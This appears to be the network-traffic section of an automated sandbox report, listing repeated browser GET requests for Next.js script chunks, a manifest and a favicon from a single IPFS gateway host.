Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3645-9203dd9404a3977e.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4787.c9a9f6a64640a9a2.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1811.1d478527d9c58149.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8882.78d4e9d7872de2c1.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9671.96a31e2ffa610a87.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3866.777e7d128e9a4375.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4254-ac0dd33f5ae839d3.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1573-73b9595d97d74de8.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3629-beffcb1d37e29d12.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7828.bc42be26a9e94bb7.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9189.3b39e44e1e1f285d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8701.d52e3ab5e2f5c410.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4815-7cc90f45fe6229bd.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1226.2b4574c57c2b36b6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6504.d2701b5d1c9eba02.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8019-7233b42ab9ef6fe6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/29107295.4a69275373f23f88.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5599-221be466b9fcb06f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5315-ede49da3c729b6f5.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7604-eabb8e5b8018f878.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4284-bbf96c7bcf282a59.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4700.1016c158c2995fc4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7978-570f194bf991f35f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-5c55ce06141b7657.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9522.ed3f6cd8a99af04d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-7cee0530881530e6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-79bce4a3a540b080.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-37e08f82b0681cde.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3645-9203dd9404a3977e.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1506-405d1202a4254f54.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1573-73b9595d97d74de8.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
